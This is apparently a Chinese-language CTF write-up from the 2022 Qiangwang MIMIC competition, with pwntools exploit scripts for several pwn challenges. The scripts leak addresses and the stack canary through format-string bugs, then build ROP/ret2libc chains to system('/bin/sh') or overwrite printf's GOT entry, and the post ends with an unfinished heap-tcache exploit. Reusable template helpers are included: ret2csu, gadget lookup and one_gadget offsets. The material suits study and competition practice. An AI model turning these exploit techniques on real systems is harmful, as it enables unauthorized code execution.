MIMIC
pwn1
送了程序地址,格式字符串漏洞爆stack、canary,有后门,然后ret2libc
exp:
#encoding = utf-8
from pwn import *
from pwnlib.rop import *
from pwnlib.context import *
from pwnlib.fmtstr import *
from pwnlib.util.packing import *
from pwnlib.gdb import *
import os
import sys
import time
#from ae64 import AE64
#from LibcSearcher import *
context.os = 'linux'
context.arch = 'amd64'
#context.arch = 'i386'
context.log_level = "debug"
name = './pwn1'
debug = 0
if debug:
p = remote('172.52.16.218',9999)
else:
p = process(name)
libcso = '/lib/x86_64-linux-gnu/libc.so.6'
#libcso = './libc-2.31.so'
libc = ELF(libcso)
#libc = elf.libc
elf = ELF(name)
context.terminal = ['gnome-terminal','-x','sh','-c']
s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
add_idx = 1
delete_idx = 2
show_idx = 4
edit_idx = 3
def dbg():
gdb.attach(proc.pidof(p)[0])
pause()
bss = elf.bss()
li('bss = '+hex(bss))
'''
def choice(cho):
sla('enter your command: \n',cho)
def add(idx):
choice(add_idx)
sla('choise:',idx)
def delete(idx):
choice(delete_idx)
sla('Index: \n',idx)
def show(idx):
choice(show_idx)
sla('Index: ',idx)
def edit(idx,content):
choice(edit_idx)
sla('Index: ',idx)
p.sendlineafter('Message: \n',content)
'''
ru('Welcome to mimic world,try something\n')
sl('1')
ru('tricks\n')
pie = int(p.recv(14),16)-0xa94
li('pie = '+hex(pie))
sl('2')
ru('hello')
backdoor = pie+0xa00
li('backdoor = '+hex(backdoor))
p.sendline('%43$p-%39$p')
p.recvuntil('\n')
stack = int(r(14),16) #- 0x1e5a8
li('stack = '+hex(stack))
ru('-')
canary = int(p.recv(18),16)
li('canary = '+hex(canary))
sys = pie + 0x870
li('sys = '+hex(sys))
binsh = pie+0x202000+0x68
li('binsh = '+hex(binsh))
pl = b'a'*0xc8 + p64(canary) + b'b'*8 #+ p64(backdoor)
pwd = stack - 0x140
li('pwd = '+hex(pwd))
ret = pie + 0x821
rdi = pie + 0xc73
pay = b'a'*0xc8 + p64(canary) + b'b'*8 + p64(ret) + p64(rdi) + p64(binsh) + p64(sys)
'''
ru('Welcome to mimic world,try something\n')
sl('1')
ru('tricks\n')
pie = int(p.recv(14),16)-0xa94
li('pie = '+hex(pie))
sl('2')
sl('aaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p--%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-')
'''
#dbg()
p.sendline(pay)
itr()
#print('========================================================================================')
'''
def pwn():
if __name__ == '__main__':
pwn()
'''
#print('========================================================================================')
'''
bss = elf.bss()
pop_rdi_ret = libc_base + libc.search(asm('pop rdi;ret;')).__next__()
pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
pop_rdx12_ret = libc_base + libc.search(asm('pop rdx;pop r12;ret;')).__next__()
leave_ret = libc_base + libc.search(asm('leave;ret;')).__next__()
system_add = libc_base + libc.sym['system']
binsh_add = libc_base + next(libc.search(b'/bin/sh')
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
puts_addr = libc_base + libc.sym['puts']
free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
syscall = libc_base + libc.sym['syscall']
gadget = libc_base + libc.sym['svcudp_reply'] + 0x1a
li('gadget = '+hex(gadget))
mov rbp,QWORD PTR [rdi+0x48]
mov rax,QWORD PTR [rbp+0x18]
lea r13,[rbp+0x10]
mov DWORD PTR [rbp+0x10],0x0
mov rdi,r13
call QWORD PTR [rax+0x28]
'''
#print('========================================================================================')
'''
def ret2libc_leak(main,got,plt,offset):
if x64_32:
payload = b'a'*offset + b'b'*8 + p64(rdi) + p64(got) + p64(plt) + p64(main)
else:
payload = b'a'*offset + b'b'*4 + p32(plt) + p32(main) + p32(got)
return payload
def fmt_w(flag,num,offset):
if flag==2:
payload = b'%' + str(num) + b'c' + b'%' + str(offset) + b'$hn'
elif flag==1:
payload = b'%' + str(num) + b'c' + b'%' + str(offset) + b'$hhn'
'''
#print('========================================================================================')
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL
0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL
0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL
'''
#print('========================================================================================')
'''
def dbg(cmd=''):
os.system('tmux set mouse on')
context.terminal = ['gnome-terminal','-x','sh','-c']
gdb.attach(p,cmd)
pause()
command = 'b *'+ str(hex(gadget))+'\n'
dbg(command)
'''
#print('========================================================================================')
'''
sign = 'asc'
def csu(padding, rbx, rbp, r12, r13, r14, r15, ret_addr):
payload = padding
payload+= p64(gadgets1)
payload += 'b'*8
payload+= p64(rbx)
payload+= p64(rbp)
payload+= p64(r12)
if sign == 'asc':
payload+= p64(r13)
payload+= p64(r14)
payload+= p64(r15)
elif sign == 'desc':
payload+= p64(r15)
payload+= p64(r14)
payload+= p64(r13)
payload+= p64(gadgets2)
payload += 'c' * 0x38
payload += p64(ret_addr)
p.sendline(payload)
csu(write_got,1,write_got,8,main_addr)
'''
#print('========================================================================================')
pwn1-1
让人眼前一愣
func
pl = b'a'*0xe0 + p64(0)+p64(pie+0x4000)+p64(0)+p64(ret)+p64(rdi)+p64(binsh)+p64(sys)
看到师傅exp里的b'a'*0xe0 + p64(0)感到疑惑,没意识到这个大小是从哪里得到的
到read这查看一下buf,距离rbp有0xe8,而在IDA里面显示的是0x10
听大能猫爷说的好像ida里面显示的buf是func里的栈,而gdb里面显示的应该是read里面的栈吧...
exp:
ru('Welcome to mimic world,try something\n')
sl('1')
ru('tricks\n')
pie = int(p.recv(14),16) - 0x12a0
li('pie = '+hex(pie))
sl('2')
ru('hello')
sys = pie+0x1040
li('sys = '+hex(sys))
backdoor = pie+0x1180
li('backdoor = '+hex(backdoor))
binsh = pie+0x4050
li('binsh = '+hex(binsh))
ret = pie+0x101a
rdi = pie+0x1943
printf_got = pie + elf.got['printf']
pl = b'a'*0xe0 + p64(0)+p64(pie+0x4000)+p64(0)+p64(ret)+p64(rdi)+p64(binsh)+p64(sys)
payload = fmtstr_payload(8,{printf_got:p64(sys)})
dbg()
p.sendline(pl)
还有一种就是利用pwntools的工具实现格式字符串漏洞任意写,将printf_got改为system_plt表
payload = fmtstr_payload(8,{printf_got:p64(sys)})
p.sendline(payload)
p.sendline("/bin/sh")
pwn2-1
无uaf、限制数量10、但版本很低,还有后门
要用ubuntu16打
ru(b'let us give you some tips\n')
addr = int(r(14),16)
text_base = addr-0x11f0
leak("text_base",text_base)
magic_addr = text_base + 0x1b70
menu_addr = text_base + 0x1c10
add(0x38,b'aaaa') #0
add(0x38,b'aaaa') #1
delete(0)
delete(1)
add(0x18, p64(menu_addr))
#dbg('')
show(0)
标签:-%,p64,libc,pie,payload,MIMIC,base,2022,强网 From: https://www.cnblogs.com/shuzM/p/16894723.html